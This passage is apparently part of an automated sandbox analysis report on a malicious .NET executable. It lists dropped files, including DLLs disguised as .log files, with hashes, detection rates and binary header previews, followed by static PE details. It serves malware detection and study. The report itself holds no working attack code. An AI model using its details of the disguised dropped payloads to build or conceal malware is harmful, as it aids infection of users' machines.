                                                                                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\zqJiDFL1EG

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):159744
                                                                                                                                        Entropy (8bit):0.7873599747470391
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                        MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                        SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                        SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                        SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\Desktop\FsgregnE.log

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Users\user\Desktop\3e88PGFfkf.exe
                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):32768
                                                                                                                                        Entropy (8bit):5.645950918301459
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                                                                                                        MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                                                                                                        SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                                                                                                        SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                                                                                                        SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                                                                                                        Malicious:true
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                                        Joe Sandbox View:
                                                                                                                                        • Filename: 9FwQYJSj4N.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: 8k1e14tjcx.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: gkcQYEdJSO.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: CPNSQusnwC.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: Dfim58cp4J.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: IYXE4Uz61k.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: hjgesadfseawd.exe, Detection: malicious, Browse
                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                        C:\Users\user\Desktop\NWogOZDl.log

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Users\user\Desktop\3e88PGFfkf.exe
                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):69632
                                                                                                                                        Entropy (8bit):5.932541123129161
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                                                        MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                                                        SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                                                        SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                                                        SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                                                        Malicious:true
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                                                                                        C:\Users\user\Desktop\YIOWuXMo.log

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):69632
                                                                                                                                        Entropy (8bit):5.932541123129161
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                                                        MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                                                        SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                                                        SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                                                        SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                                                        Malicious:true
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                                                                                        C:\Users\user\Desktop\bAJNFhyM.log

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Users\user\Desktop\3e88PGFfkf.exe
                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):89600
                                                                                                                                        Entropy (8bit):5.905167202474779
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:1536:mspaoWV6yRfXRFHJh/fLiSI82VawF1YBJcqe:1paoWMy5XXnfXf2YSYBJcqe
                                                                                                                                        MD5:06442F43E1001D860C8A19A752F19085
                                                                                                                                        SHA1:9FBDC199E56BC7371292AA1A25CF4F8A6F49BB6D
                                                                                                                                        SHA-256:6FB2FAAC08F55BDF18F3FCEE44C383B877F416B97085DBEE4746300723F3304F
                                                                                                                                        SHA-512:3592162D6D7F0B298C2D277942F9C7E86A29078A4D7B73903183C97DACABC87E0523F0EF992F2BD7350AA8AE9D49910B3CE199BC4103F7DC268BF319293CD577
                                                                                                                                        Malicious:true
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 16%
                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.........." .....V...........t... ........@.. ....................................@.................................pt..K.......l............................................................................ ............... ..H............text....T... ...V.................. ..`.rsrc...l............X..............@..@.reloc...............\..............@..B.................t......H.......H...(q..........P.........................................................................n$..Fr.....fQ...M.:..'k.m.(G.c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW....

                                                                                                                                        C:\Users\user\Desktop\lhYdlwRP.log

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):89600
                                                                                                                                        Entropy (8bit):5.905167202474779
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:1536:mspaoWV6yRfXRFHJh/fLiSI82VawF1YBJcqe:1paoWMy5XXnfXf2YSYBJcqe
                                                                                                                                        MD5:06442F43E1001D860C8A19A752F19085
                                                                                                                                        SHA1:9FBDC199E56BC7371292AA1A25CF4F8A6F49BB6D
                                                                                                                                        SHA-256:6FB2FAAC08F55BDF18F3FCEE44C383B877F416B97085DBEE4746300723F3304F
                                                                                                                                        SHA-512:3592162D6D7F0B298C2D277942F9C7E86A29078A4D7B73903183C97DACABC87E0523F0EF992F2BD7350AA8AE9D49910B3CE199BC4103F7DC268BF319293CD577
                                                                                                                                        Malicious:true
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 16%
                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.........." .....V...........t... ........@.. ....................................@.................................pt..K.......l............................................................................ ............... ..H............text....T... ...V.................. ..`.rsrc...l............X..............@..@.reloc...............\..............@..B.................t......H.......H...(q..........P.........................................................................n$..Fr.....fQ...M.:..'k.m.(G.c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW....

                                                                                                                                        C:\Users\user\Desktop\mezlGwgJ.log

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):46592
                                                                                                                                        Entropy (8bit):5.870612048031897
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                                                                                        MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                                                                                        SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                                                                                        SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                                                                                        SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                                                                                        Malicious:true
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                        C:\Users\user\Desktop\vJMbuDiW.log

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Users\user\Desktop\3e88PGFfkf.exe
                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):46592
                                                                                                                                        Entropy (8bit):5.870612048031897
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                                                                                        MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                                                                                        SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                                                                                        SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                                                                                        SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                                                                                        Malicious:true
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                        C:\Users\user\Desktop\wMTBqZlr.log

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):23552
                                                                                                                                        Entropy (8bit):5.529329139831718
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
                                                                                                                                        MD5:8AE2B8FA17C9C4D99F76693A627307D9
                                                                                                                                        SHA1:7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
                                                                                                                                        SHA-256:0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
                                                                                                                                        SHA-512:DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
                                                                                                                                        Malicious:true
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ...............................c....@.................................ts..W.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H........O...#...........N......................................................................................................................................................................o+.tEy...7..o.v.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                        C:\Users\user\Desktop\wOXBumXW.log

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Users\user\Desktop\3e88PGFfkf.exe
                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):23552
                                                                                                                                        Entropy (8bit):5.529329139831718
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
                                                                                                                                        MD5:8AE2B8FA17C9C4D99F76693A627307D9
                                                                                                                                        SHA1:7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
                                                                                                                                        SHA-256:0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
                                                                                                                                        SHA-512:DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
                                                                                                                                        Malicious:true
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ...............................c....@.................................ts..W.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H........O...#...........N......................................................................................................................................................................o+.tEy...7..o.v.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                        C:\Users\user\Desktop\yXpCqrRs.log

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):32768
                                                                                                                                        Entropy (8bit):5.645950918301459
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                                                                                                        MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                                                                                                        SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                                                                                                        SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                                                                                                        SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                                                                                                        Malicious:true
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                        \Device\Null

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Windows\System32\PING.EXE
                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):502
                                                                                                                                        Entropy (8bit):4.601683836237033
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12:PwEHI5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:DH6dUOAokItULVDv
                                                                                                                                        MD5:7256AEF48BE14055F7E2E8DD5F0315E2
                                                                                                                                        SHA1:CCCE4EAA898142D34AABFFF1E36232C798618389
                                                                                                                                        SHA-256:34CA4C6F689AFD24CC1843C035D8D9AB3468D7649F63C534665D2785D4808593
                                                                                                                                        SHA-512:6AEDB812681823B04642F168F7D245416E4751CB40C30F438A14C6487DFC0588A25E991728A04D7CA3045FBF719BAED5EDFC298B5AA0822ECEA4E917565D00A3
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:..Pinging 701188 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

                                                                                                                                        Static File Info

                                                                                                                                        General

                                                                                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                        Entropy (8bit):1.2617733098837078
                                                                                                                                        TrID:
                                                                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                        • Windows Screen Saver (13104/52) 0.07%
                                                                                                                                        • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                                                                                        File name:3e88PGFfkf.exe
                                                                                                                                        File size:4'897'280 bytes
                                                                                                                                        MD5:99209e1f30a833e0c7654fcc0aa2c9c5
                                                                                                                                        SHA1:75ac3347aae0a9dc3520ce0d31ca6ee2c7f4bbe5
                                                                                                                                        SHA256:4cb5fdd185102520c29c5975190f67567eeffaa42dc3692ee0cc9595b8a07e20
                                                                                                                                        SHA512:abd6cac229ffac33e6ec887e41b041c4e02a5da1a054c474549657dfda326afbfd127c435f796d2945b0eb1d9586599936d0ddae339845dd43a91610c5baaa5b
                                                                                                                                        SSDEEP:12288:egY1Cj1eUAM2X3bV+rrmDl5/NJoBh3fVFycj3eI8HnR80p0C2jGJBHAfVDS3E6t1:elMednbV+rrmlzM6AOhujGJBKKE6t1
                                                                                                                                        TLSH:8F36D82429EB103AF177AFB559D1359EC6AEF6F3B7179E8E304042C64712B80CD9163A
                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.........."...................... ........@.. .......................@............@................................

                                                                                                                                        File Icon

                                                                                                                                        Icon Hash:90cececece8e8eb0

                                                                                                                                        Static PE Info

                                                                                                                                        General

                                                                                                                                        Entrypoint:0x4cf12e
                                                                                                                                        Entrypoint Section:.text
                                                                                                                                        Digitally signed:false
                                                                                                                                        Imagebase:0x400000
                                                                                                                                        Subsystem:windows gui
                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                        Time Stamp:0x6507AC75 [Mon Sep 18 01:48:37 2023 UTC]
                                                                                                                                        TLS Callbacks:
                                                                                                                                        CLR (.Net) Version:
                                                                                                                                        OS Version Major:4
                                                                                                                                        OS Version Minor:0
                                                                                                                                        File Version Major:4
                                                                                                                                        File Version Minor:0
                                                                                                                                        Subsystem Version Major:4
                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                        Entrypoint Preview

                                                                                                                                        Instruction
                                                                                                                                        jmp dword ptr [00402000h]
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al

                                                                                                                                        Data Directories

                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
